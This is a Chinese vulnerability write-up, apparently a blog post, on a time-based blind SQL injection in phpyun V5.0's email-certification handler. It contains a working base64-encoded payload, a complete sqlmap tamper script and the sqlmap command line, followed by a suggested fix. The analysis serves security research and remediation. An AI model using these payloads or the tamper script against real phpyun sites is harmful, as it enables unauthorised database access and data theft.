php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析

最新推荐文章于 2021-04-08 05:35:37 发布
最新推荐文章于 2021-04-08 05:35:37 发布
阅读量785 收藏 2
点赞数
文章标签: php100漏洞

*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做*

cms背景介绍

PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。

漏洞类型

前台SQL盲注

漏洞描述

Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL延时注入。其未对 base64解密后的email参数进行任何过滤,从而导致漏洞产生。

漏洞产生链分析:

漏洞产生点位于 app\controller\qqconnect\index.class.php的cert_action函数

7666dd69b9965dfe1b1a9734e989e911.png

可以看到此函数开头将GET取得的结果经过base64_decode函数解码后分割引入 $arr数组中,此时可以绕过全局过滤,代表此处可以控制$arr[3]的值。再往下看:

0dc84b0c0c09dcd3ec5eeae7915866f1.png

此时可以看到,由于$arr[3]的值可控,所以导致$data的 email参数可控,并且引入upCertInfo函数的email参数可控。在跟进 upCertInfo函数:

7c9823eb9c0bbe7103a14a771618f454.png

可以看到在此函数中$data以及$whereData参数未经任何过滤又将其引入 upCertEmail函数,继续跟进:

a058963d40e57c7ae30bf2dc46a2d1d1.png

可以看到此函数同样未对data数组中的参数未经过任何过滤,此时$email变量可控并将其引入 getCertInfo函数中,继续跟进:

267bd5129c875c8199a9fb0a32a0b0f5.png可以看到又将可控数据引入 select_once函数中,此时$whereData中的check可控,继续跟进:

0f8462e09487355f2de62eb2be4a56a2.png

此函数中可以看到,将拥有可控数据的$where引入checkWhere 函数(篇幅问题,代码不贴了),其函数为判断是否有limit,orderby ,orderbyfield,groupby,having 等等,并将其参数修改为`email` = $email这种格式,并且还是未对其中参数做任何过滤。

现在基本确定存在SQL注入漏洞,此时只需本地复现即可。首先查看phpyun的路由调度。

cba961c90095912851432f00ecc1c07f.png

可以看到module名为$_GET[‘m’]的值,所以此处 m的值应该为 qqconnect

bcf848776c4b41aff4c175031a809046.png控制器为C ,函数为A。由于qqconnect模块下的控制器名为 index.class.php所以c为index 。由于函数名为cert_action,所以a为 cert。

漏洞利用条件

一、首先数据库phpyun_member表中必须有用户(可以自行注册,由于该系统是招聘系统,所以不存在无法注册的问题)

二、由于db.safety.php中对传入数据的限制,通过GET传入的数据最大为80个字符,并且还是经过base64加密的。所以payload应该只有56个字符左右的限制,有大佬的话可以尝试尝试更进一步的利用。

三、phpyun_company_cert表中必须有数据,否则SQL 注入无法成功。

漏洞本地复现

设置payload为:2|||‘or (if(true,sleep(5),1));#

将payload通过base64加密: Mnx8fCdvciAoaWYodHJ1ZSxzbGVlcCg1KSwxKSk7IyA=

69e3460c2b0904f117dd0d28d8bd27fc.png

可以看到响应时间为5082millis。约为5秒。 SQL注入复现成功。

使用SQLMAP进行注入

首先要使用SQLMAP进行注入验证需要编写SQLMAP脚本辅助。观察payload,发现要将sqlmap中测试需要的payload前面添加 2||| 。并且将添加数据后的payload进行base64编码。

编写脚本:phpyun.py

#!/usr/bin/env python

"""

Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)

See the file ‘LICENSE‘ for copying permission

"""

import base64

from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def dependencies():

pass

def tamper(payload, **kwargs):

""" phpyun payload

>>> tamper("1‘ AND SLEEP(5)#")

‘MScgQU5EIFNMRUVQKDUpIw==‘

"""

payload = "2|||"+payload    #给payload添加我们需要的数据

return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload    #对新payload进行加密

将此脚本放入tamper文件夹中便可使用。

SQLMAP命令 :python sqlmap.py -u "http://target.com/?m=qqconnect&c=index&a=cert&id=1" -p "id" --tamper="tamper/phpyun.py"  --technique T  -v 3  --dbms "mysql"  --risk 3

注:sqlmap参数必须设置 --risk 等级为3。由于风险等级默认为1,payload使用and逻辑判断,会导致sql注入检测失败。将风险等级设置为3时,payload会使用OR逻辑判断。所以此处必须设置。(风险等级为3的情况下,谨慎测试upload的SQL语句。)

13136e40debaa88969ea69fb3bbe0d3a.png

漏洞修复方案

建议对app\controller\qqconnect\index.class.php的cert_action 函数中的$arr[3]使用CheckRegEmail函数检测。具体修复方法等待官方补丁phpyun官方网站

weixin_39636707
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP人才系统源码(phpyun) v5.0 beta build191016
11-05
PHP人才系统源码(phpyun) v5.0 beta build191016》 PHP人才系统是一款基于PHP编程语言和MySQL数据库的高效开源人才招聘平台,其核心设计目标是为企业和个人提供一个功能强大且灵活的求职招聘解决方案。在遵循...
PHP人才系统(phpyun) v5.0 beta build191108
09-29
PHP人才系统(phpyun) v5.0 beta build191108:打造高效开源的人才招聘平台》 PHP人才系统,简称phpyun,是一个基于PHP编程语言和MySQL数据库技术的高效开源软件,专为构建人才招聘与企业求职平台而设计。这个...
getshell.php,PHPYUN设计缺陷导致轻易Getshell
weixin_29144259的博客
04-08 233
### 简要描述:PHPYUN设计缺陷导致轻易Getshell### 详细说明:#1 设计缺陷phpyun集成了部分ucenter功能,引入了UC_KEY,且默认设置为"phpyun123456"```define("UC_KEY","phpyun123456");```你们难道不知道UC_KEY这个值的威力的多大?好吧 我就当你们不知道,详情请见```[WooYun: Discuz的利用UC_K...
phpyun-存有逻辑漏洞验证码泄露的源码包(1).zip
12-28
phpyun-存有逻辑漏洞验证码泄露的源码包,亲测可用,确实含有该漏洞,如有侵权,请联系CSDN管理员删除
php 越权 漏洞,PHPYUN最新版SQL注入及多处越权操作终结篇
weixin_35098081的博客
03-10 784
### 简要描述:PHPYUN最新版(phpyun_v3.1.0604_gbk)SQL注入及多处越权操作虽然PHPYUN在注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了,但是不需要跟引号斗争的地方还有很多,得好好检查,好好修复了!!!越权方面做的也很不错了,有些是因为SQL注入引起,有些是你们忘了加thins->uid的限制,这里再来一处前台SQL注入及多处越权操作...
php人才系统漏洞,php人才系统 注入漏洞
weixin_42131541的博客
03-18 692
### 简要描述:php人才系统 注入漏洞### 详细说明:php人才系统 注入漏洞tenpay的KEY没有初始化导致的注入漏洞!```/api/tenpay/return_url.phprequire_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");require_once(dirname(dirname(dir...
php人才系统漏洞,phpyun人才招聘cms注入漏洞
weixin_39927144的博客
03-18 388
api/alipay/alipayto.php[php]require_once("alipay_config.php");require_once("class/alipay_service.php");require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");require_once(dirname(dirn...
PHPYun XML 注入漏洞
whatiwhere的博客
12-06 1718
实验环境 实验环境 操作机系统:WindowsXP 目标网站:www.test.ichunqiu 实验目的 掌握本次漏洞的原理及其利用方法 学会如何修复Sql注入漏洞 实验工具 Hack Bar :它是火狐浏览器的一款插件,包含一些常用的工具。(SQL injection,XSS,加密等),web开发人员可以利用它,快速构建一个http请求,或者用它快速实现某种算法等,本次实验主要用到它的...
PHPYUN人才招聘系统V5.0Beta_VIP版更新包(20191008)For V4.6.1
05-04
此更新版适合VIP版从v4.61版升级至5.0,至此Phpyun系统从v4.61至v6.03所有升级补丁提供完毕,希望能对大家所在任何一个版本都能无缝升级到新版(注意 升级过程中不要落下任何补丁,如果错过补丁虽然版本显示没有变化但...
PHPYUN人才招聘系统V5.0.1Beta_VIP版更新包(20191108)For V5.0
05-04
注:(此补丁适合vip版5.0升级至5.01) 最近发现大家比较喜欢phpyun,因为我本身就是Phpyun商业用户所以官方的升级补丁也能第一时间获取,为了满足大家需求我也陆续提供了官方提供的升级补丁 后续也会陆续更新每个用户...
phpyun-存有逻辑漏洞验证码泄露的源码包.zip
03-16
phpyun-存有逻辑漏洞验证码泄露的源码包,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可
PHPYun 5.0(PHP人才系统) V5.0接口操作教程文档 .rar
11-14
PHPYun 5.0(PHP人才系统) V5.0接口操作教程文档 小程序接口及数据字典微信和支付宝配置说明
PHPYUN人才招聘系统 5.0.1 Beta
05-01
PHP人才系统(PHPYun)是专为中文用户设计和开发,程序源代码100%完全开放的一个采用PHP和MySQL数据库构建的高效的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。 PHPYUN人才招聘系统 5.0.1 Beta 更新日志:2020-07-03新增:好友助力;新增:网络招聘会;新增:身份切换控制开关;新增:PC端城市、职位搜索目录式伪静态;新增:职位描述样本;新增:聊天套餐;新增:店铺招聘按天收费;新增:手机端注册增加隐私政策等内容(针对最新政策文件);优化:CRM整体业务流程;优化:简历创建、职位创建相关选项;优化:城市、职位分类关键字自动匹配;优化:增值服务、赠送优惠券引导提醒;优化:手机端简历创建后下一步引导;优化:PC端会员中心职位管理;优化:前台简历搜索展示;优化:企业基本信息地图设置;优化:招聘会展示;优化:老版本手机端职位做301跳转;优化:OSS开启本地不再预存图片文件;优化:百聘职位默认60天结束期;优化:公告增加到期时间;优化:微信模板消息点击自动登录会员中心;优化:后台数据统计按当月时间统计(原始默认30天);修复:后台目录修改导致后台图片无法上传;修复:后台分配站点偶尔无法展示;修复:友情链接添加后不显示;修复:数据调用简历排序规则;修复:首页赏金职位链接错误;修复:企业环境展示排序;修复:后台营销邮件推广发送问题;修复:取消GIF类图片强制压缩;修复:激活企业身份,套餐查询错误;修复:分站域名信息配置不当导致无法进入后台;修复:企业导出下载简历姓名显示问题;修复:手机端快速投递简历 验证码提示问题;修复:简历创建教育完善度判断;修复:手机端附近职位大小写错误;修复:手机端急聘标志错位;修复:后台简历导入工作性质、到岗时间问题;修复:后台招聘会搜索企业错误;修复:快速投递简历未按照后台设置默认为未审核状态;修复:招聘会预留场地问题;修复:手机端分站SEO显示问题;修复:后台举报简历列表分页错误;修复:手机端置顶简历排序问题;修复:公众号内点击菜单浏览我的企业名称不显示;修复:IE11兼容性问题;修复:微信登录绑定失败;修复:专题报名问题;修复:广告添加优化;修复:邮箱认证失败;修复:海报小程序生成问题;修复:统计代码标签替换;修复:职位发布类型错误导致错误提示;修复:调整*号过滤符;修复:手机端资讯更多展示问题;修复:部分服务器环境导致图像裁剪失效;修复:积分转换的问题;修复:补充职位付费自动刷新;修复:后台数据统计相关问题;修复:PC端快速投递简历 弹出新窗口;修复:行为日志查询错误;修复:商城头像显示问题;修复:UC整合注册无法获取积分;修复:手机端未创建简历情况下显示问题;修复:聊天相关问题优化修复;修复:一些UI问题;修复:部分兼容性问题。 
phpyun5.0.1VIP版完整安装包(20200107)
03-23
本文件包为商业vip一键安装版全开源版
米安代码审计 06 PHPYUN V3.0 任意文件上传漏洞
kevinhanser
07-24 606
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 web环境: phpstudy apache+php5.2 程序版本:phpyun3.0  2013-11-02 2. 测试 首先注册一个会员 然后访问 http://192.168.171.128/member/inde...
phpyun 两处任意用户密码漏洞
_404root的博客
02-28 1685
您正在找回密码的账号为:xi***yu,请选择重置密码方式: 选择密保邮箱 9158*******com 选择绑定手机号 141*****241 若您无法使用上述方法找回,请联系客服400-880-5523
PHP网站漏洞poc,phpyun某处SQL注入漏洞含POC
weixin_32112607的博客
04-02 283
### 简要描述:20141231### 详细说明:phpyun使用了360和一个自身的防护脚本我们来看看过滤情况[](https://images.seebug.org/upload/201501/16102451cf1b07dca7d416cab0d4fd1ed863c6ab.png)这都是我们常用查询语句。出现这些语句就会结束,以及替换。不过这里有个安全隐患就是[](https://imag...
php 越权 漏洞,PHPYUN最新版多处SQL注入及越权操作二
weixin_39624769的博客
03-10 246
### 简要描述:PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作虽然PHPYUN在注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了,但是不需要跟引号斗争的地方还有很多,得好好检查,好好修复了!!!这里再来三处SQL注入及越权操作!!!### 详细说明:文件/member/model/com.class.php第一处SQL注入、越权修改...
php人才系统漏洞,phpyun人才招聘cms注入漏洞 | CN-SEC 中文网
weixin_34726945的博客
03-18 323
摘要api/alipay/alipayto.php[php]require_once(“alipay_config.php”);require_once(“class/alipay_service.php”);api/alipay/alipayto.php[php]require_once("alipay_config.php");require_once("class/alipay_servic...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值